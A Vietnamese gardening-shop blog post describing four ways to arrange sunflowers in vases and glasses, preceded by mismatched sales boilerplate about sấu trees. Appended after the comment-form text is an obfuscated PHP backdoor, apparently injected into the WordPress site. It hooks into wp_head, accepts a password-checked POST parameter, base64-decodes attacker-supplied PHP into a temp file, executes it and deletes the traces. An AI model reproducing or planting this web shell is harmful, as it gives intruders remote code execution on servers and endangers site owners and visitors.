Top 4 cách cắm hoa hướng dương siêu đẹp

Giá : Liên Hệ

Với hơn 20 năm kinh nghiệm trong nghề, vườn cây Hòa Bình cam kết:

Cung cấp cây sấu đảm bảo chất lượng với đủ kích cỡ, không giới hạn về số lượng

Trồng và chăm sóc cây đảm bảo kĩ thuật hiện đại

Bảo hành dài hạn: lên tới 6 tháng.

Hướng dẫn kĩ thuật chăm sóc cây sấu sai quả, mang lại hiệu quả kinh tế.

Đánh giá

Hoa hướng dương, một loại hoa mang rất nhiều ý nghĩa, từ lâu đã là loại hoa được rất nhiều người yêu thích. Cách cắm hoa hướng dương sao cho lột tả được hết vẻ đẹp tự nhiên của nó là điều mà nhiều người hướng đến khi cắm hoa. Bài viết này vuoncayhoabinh.com sẽ đưa tới mọi người một số cách cắm hoa hướng dương siêu đẹp, độc đáo.

 

Cắm hoa hướng dương đẹp
Cắm hoa hướng dương đẹp

 

Hoa hướng dương – Loài hoa của sự kiên định

 

Một loài hoa chỉ hướng về một phía, có lẽ đây là loài hoa duy nhất có đặc tính đó. Mặt trời ở đâu, hướng dương sẽ quay mặt về phía đó. Mặt trời giống như lý tưởng sống, giống như ước mơ, đam mê mà nhiều người luôn không ngừng vươn tới.

 

Dù có trồng ở bất cứ đâu, tất cả những bông hoa hướng dương đều thuỷ chung quay đầu về 1 phía. Điều đó đã làm nên rất nhiều ý nghĩa cho loài hào này. Sự kiên định của hoa khiến nhiều người không khỏi nể phục.

 

Hướng dương không chỉ thu hút người khác vì đặc tính của bản thân, hoa còn khiến nhiều người yêu thích bởi vẻ đẹp đơn giản, mộc mạc, hết sức tự nhiên của mình. Hoa thường xuyên là loại hoa được nhiều người lựa chọn để cắm, trang trí.

 

Thế nhưng, không phải ai cũng biết cách làm sao để có một bó, lọ hoa hướng dương đẹp đẽ. Khi cắm hướng dương, cần phải duy trì nét tự nhiên vốn có của nó. Hướng dương vốn được trồng trên những cánh đồng hướng dương. Vậy nên khi cắm, cần phải tạo cảm giác như nó vẫn đang nằm trên cánh đồng ấy, chứ không nên cắm riêng lẻ.

 

Cách cắm hoa hướng dương ấn tượng

 

Hoa hướng dương, nên hạn chế cắm riêng một bông. Nhưng không phải vì thế mà bạn không thể cắm một bông hoa. Nếu biết cách, bạn vẫn có thể gây ấn tượng mạnh với người xem chỉ với một bông hướng dương.

 

Cắm hoa hướng dương ấn tượng
Cắm hoa hướng dương ấn tượng

 

Bạn có thể sử dụng thêm 1 cành cây khô dài, cắm ngang vào bình. Sau đó đặt mới cắm thêm bông hoa hướng dương vào giữa bình. Sử dụng những bông hoa nhỏ nhắn, xinh xắn trang trí đơn giản xung quanh.

 

Nếu muốn thêm chút sắc xanh cho bình hoà, bạn có thể sử dụng những chiếc lá cỏ dài. Tạo không gian như một bãi đất hoang sơ, đơn giản, có phần trống vắng. Trên đó nổi bật lên một bông hướng dương vẫn luôn đứng thẳng, kiên định với ý chí của mình.

 

Cách cắm hoa hướng dương thơ ngây

 

Nhiều người lựa chọn cách cắm hướng dương thơ ngây này bởi sự dễ dàng và vẻ đẹp thuần khiết mà nó đem lại.

 

Chuẩn bị khoảng 5,6 bông hướng dương có kích cỡ ngang nhau. Không nên chọn hoa không đồng đều bông to bông bé, ảnh hưởng đến thẩm mỹ của chậu hoa sau khi cắm xong.

 

Cắm hoa hướng dương
Cắm hoa hướng dương

 

Cắt ngắn hoa thật cẩn thận, sao cho hợp lý với chậu. Nếu chậu cao thì nên cắt một chút cuống, còn chậu ngắn thì nên cắt nhiều hơn. Sao cho phần hoa hướng dương nhô lên trên phải dài hơn chiều dài của chậu.

 

Sau đó, cắm các bông hướng dương đó vào chậu. Dùng dây ruybăng hoặc những dây có màu sắc đẹp đẽ, buộc cụm các bông hoa lại với nhau, cố định chúng lại. Khi buộc cần chú ý sao cho các bông hoa hướng về những hướng khác nhau, xoè ra.

 

Bây giờ, đến phần trang trí phần đất dưới chậu. Có thể sử dụng thêm những hoa nhỏ nhắn, những cây cỏ cắm bên dưới, tạo cảm giác như bãi cỏ rộng lớn, có sắc vàng sắc xanh.

 

Cuối cùng, để tăng thêm vẻ ngây thơ cho chậu hoa, bạn có thể thắt thêm một chiếc nơ to dưới cầu hoa.

 

Cách cắm hoa hướng dương lãng mạn

 

Để tạo một bình hoa hướng dương ngập tràn sự lãng mạn là một việc hết sức đơn giản nếu bạn biết cách. Sử dụng tốt nhất là những chiếc bình thuỷ tinh trong suốt, cùng với một chiếc nơ bằng dây lạt.

 

Cắm hoa hướng dương đẹp
Cắm hoa hướng dương đẹp

 

Cắt tỉa những bông hướng dương, có thể cắt nhiều phần cuống một chút. Sau đó cắm hướng dương vào trong bình. Xen kẽ thêm trong đó là những bông hoa tím như hoa violet, cùng với một ít hoa baby trắng để làm nổi bật sắc vàng của lọ hoa

.

Bản thân hoa hướng dương tuy mộc mạc nhưng lại rất dễ nổi bật. Việc xen kẽ thêm những màu sắc khác như vậy sẽ làm cho hoa hướng dương trở nên lãng mạn, lại dịu dàng thơ mộng vô cùng.

 

Những bông hoa baby kia sẽ làm tăng vẻ dân dã, tự nhiên cho hướng dương. Nét lãng mạn trên cái nền dân dã. Đây thực sự là một ý tưởng rất đẹp.

 

Xong phần cắm hoa, lúc này dùng dây lạt đã chuẩn bị, buộc một vòng rồi thắt nơ quanh lọ. Nó sẽ càng làm tăng thêm vẻ giản dị, dân dã của lọ hoa.

 

Cách cắm hoa hướng dương hiện đại

 

Biết phối màu, sắp xếp hợp lý thì một lọ hoa hướng dương hiện đại sẽ hiện ra ngay trước mặt bạn. Để tăng sự độc đáo, nên sử dụng những chiếc cốc thuỷ tinh hình vuông để làm hộp hoa.

 

Cắm hoa hướng dương đẹp
Cắm hoa hướng dương đẹp

 

Mỗi chiếc cốc lót vòng quanh cốc những chiếc lá xanh, rồi lúc này đặt bông hoa hướng dương vào trong. Hoa hướng dương cắt gần hết cuống, chỉ nên để lại chừng 10cm để dễ dàng cắm vào cốc.

 

Bày thêm những bông hoa nhỏ màu đỏ, màu hồng bên cạnh để tôn lên hoa hướng dương. Dùng những chiếc lá xanh cắm vòng quanh, để nó hoà cùng với hoa màu đỏ, màu hồng làm hoa hướng dương trở nên hiện đại hơn, khác biệt hơn.

 

Trên đây là 4 cách cắm hoa hướng dương đơn giản, nhưng lại tạo ra những lọ hoa, chậu hoa vô cùng đẹp đẽ và độc đáo. Ngoài ra, bạn có thể thoải mái tự do cắm theo những kiểu khác, mang dấu ấn của riêng bạn. Nhưng dù kiểu nào thì cũng nên nhớ, làm sao có thể lột tả được vẻ đẹp của hướng dương nhé !

 

Trả lời

Email của bạn sẽ không được hiển thị công khai.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}